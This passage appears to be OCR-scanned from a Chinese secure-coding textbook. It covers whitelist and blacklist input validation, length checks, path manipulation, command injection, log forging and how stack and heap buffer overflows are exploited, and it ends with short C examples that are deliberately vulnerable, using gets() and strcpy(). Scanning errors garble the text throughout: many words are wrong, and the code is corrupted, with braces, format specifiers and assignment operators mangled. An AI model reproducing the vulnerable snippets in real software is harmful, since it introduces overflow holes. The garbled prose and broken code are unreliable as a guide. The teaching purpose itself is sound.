利用 值 选择 法 可 以 保护 数据 。 可 消除 任何 直接 使 用 输入 数据 的 企图 。 

2) 白 名 单 法 : 由 于 合法 值 范围 太 过 广泛 ， 所 以 间接 法 在 许多 情况 下 是 不 可 行 的 。 这 种 情 
况 下 ， 最 好 创建 一 个 合法 输入 值 的 白 名 单 ， 并 通过 其 中 的 选项 组 合生 成 有 效 输入 。 与 间接 法 
不 同 ， 输 入 值 可 以 任意 方式 组 合 而 成 ， 从 而 使 有 效 输入 的 范围 大 大 扩大 ， 而 不 仅 限于 一 个 预 
定 的 范围 ， 例 如 ， 可 通过 数字 和 标点 符号 的 集合 来 组 成 任意 电话 号 码 。 间 接 法 和 白 名 单 法 以 
同样 的 处 理 方式 来 对 待 意外 输入 : 拒绝 接收 。 这 两 种 方法 都 只 接收 确认 合法 有 效 的 输入 。 如 
果 需 要 应 用 程序 接收 某 个 新 的 值 或 者 字符 , 必须 要 重新 更 改 这 些 验证 逻辑 程序 以 便 接收 新 值 。 
否则 ， 这 些 值 只 会 被 拒绝 。 

。 避免 黑 名 单 法 

黑 名 单 法 是 当 采 用 白 名 单 法 无 法 轻松 实现 时 的 第 二 选择 。 它 有 选择 性 地 拒绝 或 者 逃避 潜 
在 的 危险 输入 值 或 者 序列 ， 也 就 是 说 黑 名 单 法 只 拒绝 那些 已 知 恶意 的 数据 。 由 于 在 给 定 环境 
中 ， 恶 意 值 的 集合 一 般 难以 枚 举 ， 甚 至 可 能 是 无 限 的 ， 这 就 使 得 黑 名 单 法 是 不 完善 的 。 总 之 ， 
黑 名 单 法 是 不 利于 应 用 程序 安全 的 。 

黑 名 单 法 具有 明显 的 危害 性 ， 因 为 它 也 许可 以 很 好 地 防范 某 些 基 本 的 攻击 行为 ， 例 如 阻 
止 攻击 者 通过 HTML 文件 中 的 <scrip 忆 标记 来 进行 攻击 ， 从 而 使 得 开发 人 员 陷 入 一 种 虚假 的 
安全 感 中 ， 但 当 进 行 各 种 试探 性 攻击 时 ， 这 种 方法 往往 起 不 到 防范 作用 。 如 果 程序 员 用 一 个 
简单 的 攻击 实例 来 测试 一 个 易 受 攻击 的 Web 站 点 ， 当 攻击 失败 时 ， 他 会 误 认为 这 个 站 点 是 安 
全 的 ， 但 实际 上 ， 并 不 是 这 样 。 攻 击 者 所 需要 做 的 事情 就 是 ， 确 定 哪些 字符 没有 列 于 黑 名 单 
中 ， 或 者 使 用 其 他 适当 的 编码 方式 来 完全 绕 过 黑 名 单 验证 。 

实际 上 ， 当 输入 经 过 验证 后 又 要 进行 变换 时 ， 黑 名 单 法 通常 都 是 失败 的 。 通 过 解压 缩 、 
解码 、 改 变 字符 集 、 剥 离 多 层 编码 或 者 通配符 扩展 等 操作 ， 都 可 以 改变 输入 的 含义 。 

。 不 要 混淆 可 用 性 和 安全 性 

不 要 将 应 用 程序 为 了 可 用 性 目的 而 执行 的 验证 ， 和 为 了 安全 目的 所 进行 的 输入 验证 混 为 
一 谈 。 出 于 用 户 界 面 友好 目的 而 进行 的 输入 验证 ， 通 常 是 为 了 在 合法 用 户 犯 错时 捕获 常见 
错误 ， 提 供 易于 理解 的 反馈 。 为 安全 目的 进行 的 输入 验证 是 为 了 处 理 非 同 寻常 的 、 不 友好 
的 输入 。 

。 拒绝 不 良 数据 

有 些 程序 员 试图 修复 某 些 已 经 验证 失败 的 输入 类 型 。 如 果 用 户 遗 漏 了 某 个 必须 输入 的 字 
段 ， 可 以 设置 一 个 默认 值 ; 超出 最 大 长 度 限制 的 口令 字段 可 以 截断 ; 输入 字段 值 的 JavaScript 
程序 可 代 之 以 转 义 字符 。 不 要 试图 修复 未 通过 输入 验证 的 输入 。 相 反 ， 要 坚定 不 移 地 拒绝 接 
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收 这 种 输入 。 

输入 验证 本 身 就 是 一 个 复杂 的 主题 ， 但 在 程序 中 既 有 执行 输入 验证 的 代码 ， 又 掺 杂 着 自 
动 纠正 输入 错误 的 代码 ， 当 数据 以 多 种 方式 编码 或 者 可 以 分 层 或 者 嵌 套 编码 时 尤其 如 此 ， 那 
程序 的 复杂 性 就 会 呈 爆 炸 性 地 增长 。 用 于 自动 纠 错 的 程序 可 能 会 改变 输入 数据 的 本 意 ， 或 者 
使 得 用 于 验证 输入 的 逻辑 程序 受到 影响 。 

如 果 攻 击 者 想 要 输入 列 于 黑 名 单 的 某 个 单词 ， 怎 么 办 呢 ?” 当 然 ， 选 择 男 一 个 没有 出 现在 
黑 名 单 中 的 单词 是 一 个 不 错 的 选择 ， 但 如 果 不 使 用 某 个 列 于 黑 名 单 中 的 词 就 不 能 够 正确 表达 
意图 ， 又 该 怎么 办 呢 ? 比较 简单 的 方法 是 ， 将 一 个 列 于 黑 名 单 中 的 词 插入 到 需要 输入 的 单词 
中 。 例 如 ， 这 个 纠 错 程序 正好 可 以 将 输入 “bastpruntich” 纠 正 为 “bastich”。 在 这 种 自动 纠 错 
的 应 用 程序 中 ， 不 能 正确 处 理 这 种 多 层 编码 的 输入 是 常见 错误 ， 而 且 可 能 导致 严重 后 果 。 

不 能 为 攻击 者 将 某 个 输入 转换 成 另 一 个 输入 。 直 接 拒绝 没有 通过 输入 验证 的 数据 。 当 考 
虑 是 否 需 要 在 输入 验证 程序 中 加 入 数据 纠正 功能 时 , 先 问 问 自己 , 谁 可 能 提供 这 些 不 良 输入 。 
从 安全 角度 看 ,存在 两 种 可 能 : 偶然 失误 的 用 户 或 者 故意 试图 破坏 规则 的 攻击 者 。 对 于 前 者 ， 
合法 用 户 可 能 比较 赞成 应 用 程序 指出 错误 输入 以 引起 他 们 的 注意 ， 并 且 允 许 他 们 纠正 自己 的 
错误 ， 以 免 将 来 再 犯 同样 的 错误 。 对 于 攻击 者 ， 需 要 记 住 ， 无 须 为 试图 破坏 应 用 程序 正常 运 
行 的 输入 数据 忙碌 。 

。 默认 执行 正确 的 输入 验证 

无 论 使 用 何 种 编程 语言 ， 用 于 接收 输入 的 标准 方法 都 没有 提供 一 个 内 置 输入 验证 功能 。 
这 意味 着 ， 每 当 程序 员 需 要 添加 新 的 代码 来 检索 某 种 新 输入 时 ， 都 需要 重新 处 理 整个 输入 验 
证 过 程 。 

不 要 每 次 都 为 输入 验证 问题 重新 编写 一 个 新 的 解决 方法 ， 而 需要 在 应 用 程序 中 清晰 、 一 
致 地 编写 输入 验证 函数 。 这 意味 着 ， 需 要 在 应 用 程序 用 于 获取 输入 的 系统 类 库 的 顶层 编写 一 
个 抽象 层 。 通 过 自己 编写 函数 或 者 方法 层 来 取代 内 置 函 数 ， 可 使 用 程序 默认 执行 正确 的 输入 
验证 。 我 们 将 此 称 为 强 安 全 API。 

当 程序 员 使 用 安全 API 时 ， 相 比 直接 调用 内 置 方法 而 言 ， 通 常 需要 提供 更 多 的 参数 。 这 
些 附 加 参数 将 携带 用 于 在 调用 函数 中 执行 正确 的 输入 验证 所 需 的 信息 。 

我 们 不 准备 介绍 这 样 的 输入 数据 过 滤 程 序 ， 可 将 同样 的 准则 用 于 应 用 程序 所 接收 的 任何 
输入 。 绝 大 多 数 情况 下 ， 只 在 应 用 程序 前 端 提供 的 环境 下 ， 很 难 实现 正确 的 语法 和 语义 检查 。 

强 安全 API 提高 了 以 下 几 个 方面 的 能 力 : 

1) 对 所 有 的 输入 提供 与 上 下 文 相关 的 输入 验证 。 相 比 每 个 模块 都 单独 实现 自己 的 输入 验 
证 来 说 ， 采 用 这 种 方法 ， 困 难 在 于 建立 一 致 的 输入 验证 策略 。 

2) 理解 并 维护 输入 验证 逻辑 。 输入 验证 是 不 容易 处 理 的 。 多 种 不 同 的 实现 方式 使 得 程序 
需要 执行 的 测试 与 确认 工作 量 大 大 增加 ， 使 得 一 项 本 来 就 很 艰巨 的 任务 变 得 更 加 困难 。 

3) 可 连续 一 致 地 更 新 和 修改 输入 验证 方法 。 当 发 现 输入 验证 逻辑 中 的 错误 时 , 能 否 修 正 
这 些 错 误 ? 如 果 没有 集中 实现 多 和 辑 验证 程序 ， 恐 怕 答 案 只 能 是 “我 不 知道 ”。 

4) 始终 如 一 。 如 果 不 默认 执行 输入 验证 , 程序 员 很 可 能 会 忘记 编写 这 些 程序 。 通 过 将 输 
入 验证 作为 标准 处 理 过 程 的 一 部 分 ， 可 保证 应 用 程序 接收 到 的 所 有 输入 都 是 合法 有 效 的 。 
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不 要 过 度 重视 通用 性 也 很 重要 : 避免 降低 输入 验证 的 严格 性 来 换取 更 多 的 通用 性 。 只 有 
在 验证 逻辑 程序 功能 强大 到 足以 增强 输入 所 需 的 限制 ， 以 保证 其 在 所 使 用 的 上 下 文 环境 中 足 
够 安全 时 ， 才 能 重复 使 用 验证 逻辑 程序 。 

。 检验 输入 的 长 度 

前 面 的 验证 逻辑 通常 检查 输入 的 长 度 是 否 位 于 一 个 最 小 值 和 最 大 值 之 间 。 长 度 检查 通常 
比较 容易 做 到 ， 因 为 并 不 需要 了 解 输 入 的 含义 就 可 以 实现 。 但 需要 注意 的 是 ， 如 果 应 用 程序 
在 处 理 输入 以 前 先进 行 输入 转换 ， 则 输入 还 可 能 会 变 得 过 长 。 

输入 验证 的 最 基本 功能 是 执行 长 度 检查 ， 这 是 其 他 功能 的 前 提 。 在 输入 验证 期 间 ， 最 好 
能 够 尽 可 能 多 地 考虑 应 用 程序 的 上 下 文 环境 。 在 应 用 程序 需要 验证 某 个 输入 字段 时 ， 验 证 由 
辑 如 果 尽 可 能 多 地 了 解 到 这 个 输入 字段 的 合法 值 ， 就 可 以 更 加 严格 地 执行 验证 。 

良好 的 程序 设计 习惯 是 ， 千 万 不 要 将 前 端 验 证 代码 和 业务 逻辑 紧密 地 交叉 混合 在 一 起 。 
这 样 做 的 后 果 就 是 ， 验 证 程序 很 少 能 够 具备 完善 的 上 下 文 关系 来 最 好 地 验证 输入 。 依 赖 于 应 
用 程序 的 上 下 文 环 境 关 系 来 区 分 前 端 输入 验证 和 混杂 在 应 用 逻辑 中 的 验证 检查 ;但 在 前 端 验 
证 中 至 少 要 包含 输入 长 度 验证 。 

验证 输入 是 否 超过 长 度 上 限 ， 可 以 使 得 攻击 者 难以 利用 系统 的 其 他 漏洞 。 例 如 ， 如 果 某 
个 输入 字段 可 用 作 跨 站 点 脚本 攻击 的 一 个 部 分 ， 与 只 能 输入 少量 字符 的 攻击 者 相 比 ， 可 以 编 
写 任意 长 度 代码 的 攻击 者 具备 更 大 的 灵活 性 。 通过 检验 输入 的 长 度 是 否 小 于 最 小 输入 长 度 ， 
攻击 者 不 仅 无 法 忽略 必须 输入 数据 的 输入 字段 ， 而 且 不 能 因为 输入 数据 长 度 短 而 导致 数据 
有 效 。 

。 限制 数值 输入 

检查 数值 输入 是 否 介 于 最 大 值 和 最 小 值 之 间 也 是 输入 验证 的 一 部 分 。 应 当 警 惕 某 些 操作 
可 能 传递 超过 最 大 值 和 最 小 值 范围 的 数据 。 

当 攻击 者 利用 整数 变量 的 有 限 容量 时 ， 我 们 称 之 为 整数 溢出 。 在 C 和 C++ 中 ， 比 较 典 型 
的 方式 是 ， 将 整数 溢出 作为 缓冲 区 溢出 攻击 计划 的 一 个 组 成 部 分 。Java 中 的 整数 溢出 并 不 会 
导致 缓冲 区 溢出 攻击 ， 但 仍 会 导致 其 他 不 良 后 果 。 

避免 整数 溢出 问题 的 最 好 方法 是 ， 检 验 所 有 的 整数 输入 是 否 都 位 于 上 下 界 范围 内 。 理 想 
情况 下 ， 上 下 界 的 选择 应 当 使 得 任何 后 续 计算 结果 都 不 会 超出 所 使 用 变量 的 容量 限制 。 如 果 
这 样 的 界定 范围 过 于 严格 , 则 应 用 程序 必须 包括 内 部 检验 以 保证 所 计算 的 数值 不 会 导致 溢出 。 

3. 防止 元 字符 攻击 


允许 攻击 者 控制 发 送 到 数据 库 、 文 件 系 统 、 浏 览 器 或 者 其 他 子 系统 的 命令 ,会 导致 很 大 
的 灾难 。 绝 大 多 数 程序 员 都 没有 思春 到 故意 给 攻击 者 提供 直接 访问 这 些 子 系统 的 权限 ， 但 是 
因为 接口 设计 的 方式 问题 ， 很 可 能 无 意 中 就 提供 了 这 种 便利 。 

所 有 强调 易于 使 用 或 者 提供 交互 能 力 的 脚本 语言 和 标记 语言 至 少 有 一 点 是 相同 的 ， 它 们 
可 以 接收 将 控制 结构 和 数据 随意 结合 在 一 起 的 字符 串 。 

问题 在 于 ， 如 果 程序 员 不 加 特别 注意 ， 则 可 能 会 提供 添加 、 删 除 或 者 改变 控制 结构 含义 
的 能 力 ， 尽 管 程序 员 的 本 意 只 是 允许 用 户 列举 某 些 特定 数据 ， 这 是 很 不 明智 的 。 攻 击 者 常 通 
过 指定 元 字符 来 利用 这 个 漏洞 实施 攻击 ， 所 谓 元 字符 就 是 在 输入 语言 中 具有 特定 含义 的 字符 
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或 者 字符 串 。 事 实 上 ， 通 常 对 于 同一 个 元 字符 存在 多 种 编码 方式 ， 而 且 同 一 语言 的 不 同 编程 
方式 ， 可 能 会 接受 不 同 元 字符 或 者 元 字符 的 不 同 编码 ， 这 就 使 得 问题 更 加 复杂 。 

许多 元 字符 问题 都 可 以 采用 同一 种 方法 来 解决 , 即使 用 参数 化 命令 。 本 节 在 此 基础 之 上 ， 
研究 三 种 其 他 类 型 的 元 字符 攻击 : 路 径 操作 、 命 令 行 注入 、 日 志 欺 骗 。 

。 使 用 参数 化 请 求 

通过 将 数据 和 控制 信息 分 开 ， 可 以 消除 很 多 元 字符 攻击 漏洞 。 我 们 一 定 要 应 用 好 那些 本 
身 就 拥有 这 种 分 隔 能 力 的 接口 程序 ， 它 们 允许 应 用 程序 提交 作为 参数 值 的 一 系列 数据 或 者 一 
个 参数 化 请 求 。 

。 路 径 操作 

如 果 允 许 用 户 的 输入 可 包含 文件 系统 元 字符 ， 例 如 正 斜 杠 /)、 反 斜 杠 () 或 者 小 数 点 ()， 
那么 攻击 者 就 可 以 在 需要 提供 相对 路 径 的 输入 中 指定 一 个 绝对 路 径 ， 或 者 通过 往 上 移动 目录 
树 来 将 文件 系统 移动 到 另 一 个 位 置 。 这 种 未 经 授权 的 文件 系统 访问 称 为 路 径 操纵 。 

。 命令 注入 

如 果 允 许 通 过 用 户 输入 来 指定 应 用 程序 所 执行 的 系统 命令 ,攻击 者 就 能 在 系统 中 执行 他 
们 想 要 执行 的 恶意 命令 。 如 果 这 个 输入 可 包含 文件 系统 或 者 外 过 元 字符 ， 攻 击 者 就 可 以 在 需 
要 输入 相对 路 径 的 地 方 指定 绝对 路 径 ， 或 者 在 应 用 程序 需要 执行 的 命令 后 面 跟随 一 条 恶意 命 
令 。 未 经 许可 的 命令 执行 权限 称 为 命令 注入 攻击 。 

。 日 志 欺 骗 

因为 日 志文 件 对 于 系统 管理 员 和 开发 人 员 都 很 重要 ， 所 以 日 志文 件 也 是 攻击 者 的 目标 。 
如 果 攻 击 者 可 以 控制 写 入 到 日 志文 件 中 的 值 ， 就 可 以 通过 在 所 提供 的 输入 中 包括 虚构 的 日 志 
记录 来 伪造 系统 时 间 。 如 果 因 为 缺少 适当 的 输入 验证 而 使 得 攻击 者 可 将 记录 写 入 到 日 志文 件 
中 ， 则 日 志文 件 的 准确 性 就 受到 了 干扰 或 者 误导 ， 因 而 降低 了 日 志文 件 的 分 析 价 值 。 

稍 好 一 点 的 情况 是 ， 攻 击 者 也 许 只 是 通过 提供 包含 特殊 字符 的 输入 将 虚假 记录 插入 到 日 
志文 件 。 如 果 自 动 处 理 日 志文 件 , 那么 攻击 者 就 可 通过 改变 日 志文 件 的 格式 来 改写 这 些 文件 。 
设计 更 巧妙 的 攻击 方式 还 可 以 牌 曲 日 志文 件 的 统计 数据 。 

伪造 的 或 者 被 破坏 的 日 志文 件 可 以 用 于 掩盖 攻击 者 的 痕迹 ， 或 者 隐 含 着 另 一 个 恶意 行 
为 。 如 果 日 志文 件 包含 与 安全 相关 的 信息 ， 攻 击 者 可 能 将 日 志文 件 变 为 常见 的 错误 ; 如 果 攻 
击 者 在 日 志文 件 中 写 入 足够 多 的 误 报 ， 使 管理 员 不 再 对 错误 进行 关注 ， 那 么 当真 正 的 警报 产 
生 时 ， 就 不 会 有 人 关注 。 


4.4.2 缓冲 区 溢出 


在 3.2 节 中 我 们 已 经 提 到 过 “缓冲 区 溢出 ”， 在 本 节 中 ， 我 们 将 详细 地 分 析 缓 冲 区 溢出 的 
概念 和 其 带 来 的 安全 威胁 。 

几乎 任何 一 个 经 常 使 用 计算 机 的 人 都 知道 缓冲 区 溢出 的 大 名 。 在 软件 行业 中 ， 通 常 将 组 
冲 区 溢出 理解 为 将 大 量 数 据 塞 入 到 一 个 较 小 缓冲 区 中 所 导致 的 程序 漏洞 。 绝 大 多 数 情况 下 ， 
这 是 非常 精确 的 理解 。 当 应 用 程序 将 数据 写 入 到 所 分 配 的 内 存 区 以 外 时 ， 就 会 发 生 缓冲 区 溢 
出 。 缓 冲 区 溢出 漏洞 通常 被 攻击 者 用 于 重 写 内 存 中 的 数据 。 缓 冲 区 溢出 错误 非常 常见 ， 存 在 
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漏洞 的 应 用 程序 往往 会 给 攻击 者 提供 很 大 的 控制 权 。 因 此 ， 缓 冲 区 溢出 成 为 攻击 者 的 常见 攻 
击 目标 并 不 奇怪 。 
1. 缓冲 区 溢出 简介 


我 们 已 经 知道 ， 缓 冲 区 溢出 指 的 是 一 种 常见 且 危 害 很 大 的 系统 攻击 手段 ， 通 过 向 程序 的 
缓冲 区 写 入 超出 其 长 度 的 内 容 ， 造 成 缓冲 区 的 溢出 ， 从 而 破坏 程序 的 堆栈 ， 使 程序 转 而 执行 
其 他 的 指令 ， 以 达到 攻击 的 目的 。 防 止 缓冲 区 溢出 攻击 的 最 佳 方式 是 使 用 强制 执行 内 存 安全 
和 类 型 安全 的 编程 语言 。 在 不 安全 的 编程 语言 中 ， 例 如 最 广泛 使 用 的 C 和 C++ 语言， 程序 员 
要 负责 阻止 对 内 存 进行 不 合 需要 的 修改 。 任 何 操纵 内 存 的 操作 都 可 以 导致 缓冲 区 溢出 ， 但 实 
际 上 ， 最 容易 导致 缓冲 区 溢出 的 错误 主要 集中 在 一 定 范围 内 的 某 些 操作 中 。 下 面 是 典型 的 组 
冲 区 溢出 漏洞 利用 方式 。 

。 利用 缓冲 区 溢出 漏洞 

为 了 解 缓冲 区 溢出 漏洞 所 带 来 的 风险 ， 需 要 先 了 解 攻击 者 是 如 何 利用 缓冲 区 溢出 漏洞 
的 。 在 一 个 典型 的 堆栈 攻击 中 ， 攻 击 者 向 存在 堆栈 缓冲 区 溢出 漏洞 的 应 用 程序 发 送 包含 一 段 
恶意 代码 的 数据 。 除 了 在 数据 中 包含 恶意 代码 以 外 ， 攻 击 者 还 在 数据 中 包含 这 段 恶意 代码 的 
初始 内 存 地 址 。 当 缓冲 区 溢出 攻击 发 生 时， 应 用 程序 将 攻击 者 的 数据 写 入 缓冲 区 中 ， 并 且 不 
考虑 缓冲 区 的 上 限 持续 写 入 数据 ， 直 到 以 恶意 代码 的 地 址 重 写 函 数 的 返回 地 址 。 当 这 个 函数 
返回 时 ， 它 直接 跳 转 到 存储 在 返回 地 址 中 的 值 。 正 常情 况 下 ， 应 该 返回 到 调用 函数 ， 但 因为 
返回 地 址 已 经 被 改写 了 ， 所 以 程序 直接 跳 转 到 替代 缓冲 区 ， 继 续 执行 攻击 者 的 恶意 代码 。 为 
了 提高 推测 出 恶意 代码 正确 地 址 的 可 能 性 ， 攻 击 者 采用 的 典型 攻击 方式 是 在 输入 的 起 始 处 加 
上 一 段 N( 非 操作 性 ) 指 令 。 

对 缓冲 区 溢出 攻击 最 常见 的 误解 就 是 ， 只 有 当 缓 冲 区 位 于 堆栈 上 时 才 可 能 被 利用 。 而 事 
实 并 非 如 此 ， 存 储 在 堆 上 的 重要 数据 同样 可 以 被 基于 堆 的 缓冲 区 溢出 攻击 改写 ， 而 且 应 用 程 
序 控制 流 也 能 被 攻击 者 改变 。 例 如 ， 攻 击 者 可 改写 函数 指针 的 值 ， 当 应 用 程序 调用 这 个 函数 
背 针 指向 的 函数 时 ， 就 会 执行 恶意 代码 。 最 后 ， 即 使 攻击 者 不 能 将 恶意 代码 注入 系统 中 ， 一 
种 统称 为 arc 注入 或 者 retum-into-libc 的 利用 技术 , 也 可 以 通过 缓冲 区 溢出 来 改变 应 用 程序 的 
控制 流 。 

。 缓冲 区 分 配 策略 

绝 大 多 数 防止 缓冲 区 溢出 的 策略 都 侧重 于 如 何以 及 何 时 检查 出 某 种 情况 将 会 导致 缓冲 
区 溢出 。 在 讨论 这 些 策略 前 ， 先 考虑 这 种 检查 失败 时 ， 将 会 发 生 什么 事情 。 其 核心 就 是 内 存 
分 配 问 题 。 如 果 当 前 分 配 的 缓冲 区 空间 不 能 满足 操作 所 需 的 缓冲 区 空间 ， 应 用 程序 可 执行 下 
列 两 个 操作 之 一 

D 保持 当前 缓冲 区 大 小 不 变 ， 终 止 整个 程序 或 者 完成 部 分 操作 ; 

@ 动态 分 配 缓冲 区 ， 满 足 操作 的 缓冲 区 空间 需求 。 

大 型 应 用 程序 通常 总 在 某 些 情况 下 选择 使 用 静态 分 配 ， 而 在 另外 一 些 情况 下 采用 动态 分 
配 。 程 序 员 需要 根据 正在 进行 的 任务 来 选择 两 种 方式 之 一 。 无 论 在 特定 的 程序 段 中 采用 何 种 
解决 方式 ， 定 义 一 个 系统 的 、 明 确 的 内 存 分 配方 法 ， 可 以 使 得 无 论 对 于 人 工 或 者 工具 来 说 ， 
检验 代码 和 快速 确定 其 安全 性 都 变 得 更 加 容易 。 对 特定 类 型 的 操作 ， 一 定 要 保证 所 选 解决 方 
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案 的 一 致 性 。 在 给 定 的 上 下 文 环境 中 ， 要 明确 已 接受 的 缓冲 机 制 ， 使 得 程序 员 、 审 查 员 和 工 
具 软 件 都 能 明白 预期 的 反应 ， 并 能 更 好 确定 无 意 中 产生 的 错误 。 一 致 性 使 得 错误 更 容易 被 


发 现 。 

1) 静态 缓冲 区 分 配 : 在 静态 缓冲 区 分 配 机 制 中 , 缓冲 区 中 的 内 存 是 一 次 性 分 配 的 ， 并 且 
这 个 缓冲 区 在 存储 期 间 一 直 保持 初始 分 配 的 大 小 。 这 种 方法 的 最 大 好 处 就 是 简单 。 因 为 缓冲 
区 在 整个 生存 期 内 都 保持 同样 的 大 小 ， 所 以 程序 员 易 于 了 解 缓冲 区 的 大 小 ， 并 能 确定 在 其 中 
执行 的 操作 是 否 安全 。 给 一 个 缓冲 区 只 分 配 一 次 内 存 简化 了 缓冲 区 的 操作 代码 ， 便 于 人 工 和 
自动 代码 审查 。 尽 管 静态 分 配方 法 易于 操作 , 但 同时 它 也 有 弱点 。 因 为 在 应 用 程序 编译 以 前 ， 
程序 员 必 须 为 每 个 缓冲 区 选 定 最 大 长 度 ,所 以 静态 分 配 缓冲 区 的 应 用 程序 自然 就 缺少 灵活 性 。 
在 静态 分 配 机 制 中 ， 当 缓冲 区 过 小 而 不 能 满足 输入 数据 的 要 求 时 ， 唯 一 的 选择 就 是 拒绝 执行 
操作 ， 或 者 截断 数据 并 返回 一 个 错误 消息 。 数 据 截 断 操作 可 能 引起 大 量 难以 捕 提 的 逻辑 和 表 
达 错 误 ， 其 严重 性 根据 情况 发 生 的 环境 而 定 。 甫 态 固定 大 小 缓冲 区 的 另 一 个 副作用 是 ， 当 组 
冲 区 所 需 的 最 大 字 节 数 远 远大 于 所 使 用 的 平均 容量 时 ， 存 在 潜在 的 资源 浪费 。 例 如 ， 一 个 处 
理 电子 邮件 的 应 用 程序 需要 分 配 一 个 足够 大 的 缓冲 区 , 以 便 能 容纳 最 大 的 有 效 电子 邮件 地 址 ， 
虽然 在 绝 大 多 数 情况 下 这 些 地 址 都 没有 那么 长 。 在 大 型 应 用 程序 中 ， 当 许多 缓冲 区 都 是 部 分 
填充 时 ， 这 些 资 源 炙 加 起 来 也 很 惊人 。 

2) 动态 缓冲 区 分 配 : 动态 缓冲 区 分 配方 法 可 根据 应 用 程序 运行 时 所 需 的 值 , 动态 分 配 组 
神 区 的 大 小 。 因 为 在 应 用 程序 编译 时 不 需要 确定 缓冲 区 的 大 小 ， 所 以 当 应 用 程序 所 操作 的 数 
据 在 运行 时 变化 很 大 时 ， 动 态 解决 方案 给 应 用 程序 提供 了 更 大 的 灵活 性 。 动 态 分 配 还 带 来 了 
男 一 个 问题 。 因 为 动态 方法 是 数据 驱动 的 ， 意 想不到 的 或 者 恶意 的 输入 可 能 导致 系统 耗 尽 内 
存 资源 。 在 静态 分 配方 式 中 ， 在 编译 期 间 就 确定 了 需要 接收 或 者 操作 多 少数 据 。 只 有 当 绥 冲 
区 溢出 发 生 时 ， 这 些 限制 才 可 能 被 打破 ， 因 此 资源 耗 尽 问题 并 不 是 程序 员 考 虑 的 重点 。 但 在 
动态 分 配 缓冲 区 时 需要 限制 所 接收 的 数据 总 量 ， 需 要 由 特定 的 检查 程序 来 完成 这 个 任务 。 必 
须 执行 明确 的 、 完 善 的 检查 程序 ， 以 确定 在 改变 缓冲 区 大 小 时 ， 没 有 分 配 一 个 不 合理 的 内 存 
空间 。 

。 跟踪 缓冲 区 大 小 

C 和 C++ 内 置 的 帮助 程序 员 跟 踪 缓冲 区 大 小 的 功能 十 分 有 限 ， 仅 返回 字符 串 长 度 。 如 果 
在 当前 范围 的 堆栈 上 为 变量 分 配 缓冲 区 ， 通 过 sizeof 操作 能 够 获取 为 其 分 配 内 存 的 长 度 ， 不 
过 ， 如 果 是 在 堆 上 为 此 变量 分 配 空间 ， 则 获取 的 只 是 指针 大 小 。 如 果 缓冲 区 含有 一 个 字符 串 ， 
则 要 想 计算 出 这 个 字符 串 所 占 内 存 的 大 小 ,可 使 用 计算 Null 终止 符 前 的 字 节 数 的 方法 。 唯 一 
的 通用 解决 方案 是 用 单个 不 同 值 来 跟踪 每 个 缓冲 区 的 当前 大 小 。 这 样 做 可 以 避免 通过 假定 来 
保证 缓冲 区 操作 是 安全 的 。 但 无 论 如 何 ， 只 要 某 个 操作 改变 了 内 存 分 配 状况 ， 就 需要 及 时 更 
新 所 存储 的 缓冲 区 长 度 值 。 

追踪 缓冲 区 和 其 大 小 的 最 常见 方法 是 ， 将 它们 存储 在 一 个 复合 数据 结构 中 。 这 个 方法 基 
本 上 就 可 以 保证 内 存 安全 。 保 证 内 存 安全 的 编程 语言 追踪 每 个 缓冲 区 的 大 小 ， 并 且 在 对 缓冲 
区 执行 操作 以 前 先 比较 其 大 小 。 如 果 一 种 编程 语言 可 以 实现 这 种 工作 将 程序 员 解 放出 来 ， 那 
么 无 论 你 的 应 用 程序 是 否 需要 以 这 种 编程 语言 来 重新 实现 ， 都 是 值得 考虑 的 。 
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绝 大 多 数 与 人 工 追 踪 缓冲 区 大 小 相关 的 错误 都 发 生 在 缓冲 区 的 大 小 不 能 够 正确 维护 时 。 
这 往往 都 是 因为 ， 在 程序 中 动态 更 改 了 缓冲 区 的 大 小 ， 却 没有 更 新 相关 缓冲 区 大 小 的 值 而 导 
致 的 。 一 个 陈旧 的 缓 神 区 大 小 值 比 不 记录 缓冲 区 大 小 更 危险 ， 因 为 这 个 缓冲 区 上 的 后 续 操 作 
会 绝对 信任 已 存储 的 缓冲 区 大 小 。 最 好 提供 集中 的 库 函 数 来 维护 常见 数据 结构 的 缓冲 区 大 小 。 
这 样 做 可 以 仔细 审核 用 于 更 新 这 些 缓冲 大 小 值 的 代码 ， 以 避免 错误 。 

2. 缓冲 区 溢出 分 类 


1) 字符 串 

基本 的 C 字符 串 数据 结构 ( 带 有 Null 终止 符 的 字符 数组 ) 也 是 错误 来 源 之 一 ， 内 置 的 、| 
于 字符 串 操作 的 库 函 数 只 能 使 得 事情 更 加 糟糕 。 本 节 将 回顾 字符 串 操作 函数 的 最 初 设置 ， 然 
后 介绍 第 二 代 字 符 串 操作 函数 ( 绝 大 多 数 这 样 的 函数 名 中 都 带 有 n 字母 )， 以 及 它们 所 导致 的 
问题 。 然 后 探讨 使 用 Null 终止 符 来 指定 字符 串 长 度 所 带 来 的 问题 。 随 后 ， 讨 论 字符 串 导 致 组 
神 区 溢出 的 其 他 两 种 方式 : 多 字 节 字符 和 格式 串 。 最 后 研究 一 些 可 采用 更 安全 方式 来 访问 字 
符 串 的 库 函 数 。 

。 天 生 危 险 的 函数 

许多 C 字符 串 函数 容易 被 错误 使 用 。 最 好 是 完全 避免 使 用 这 些 函 数 ， 而 不 是 小 心 辟 翼 地 
考虑 如 何 才能 不 出 错 。 尽 量 不 要 使 用 那些 天 生 和 危险 的 gets0、scanf0 等 字符 串 操纵 函数 。 看 下 
面 的 一 个 例子 : 

#include <stdio.h> 

int main() 

t 

char name[8] = (0); 

printf("Your name:"); 

gets (name) ; 

printf("Hello,$s! ",name); 


return 0; 
} 


这 里 的 gets 函数 不 会 检查 输入 的 字符 串 是 否 超出 分 配 空间 的 大 小 ,因而 导致 缓冲 区 溢出 。 

。 有 界 字 符 串 操作 

在 C 和 C++ 程序 中 发 现 的 许多 早期 缓冲 区 溢出 漏洞 ,都 是 由 字符 串 操作 引起 的 。 当 发 现 
像 stcpy0 和 strcat0 这 样 的 函数 存在 漏洞 时 , C 语言 的 设计 者 修正 了 C 标准 , 引入 这 些 函 数 的 
有 边界 限制 的 等 价 函 数 ， 例 如 stmcpy0 和 stmcat0。 这 些 有 界 函 数 接收 一 个 参数 ， 限 制 写 入 到 
目标 缓冲 区 中 的 数据 总 量 。 下 面 是 strepy0 溢 出 的 例子 : 

char s[]-"abcdefg"; 

char d[]-"abc"; 

strcpy (d,s); 

printf("result: %s",d); 

MEE e 编译 结果 )， 代 码 中 将 长 字符 串 赋值 给 短 字符 串 ， 会 造成 内 存 溢出 。 

。 有 界 函 数 的 常见 缺陷 
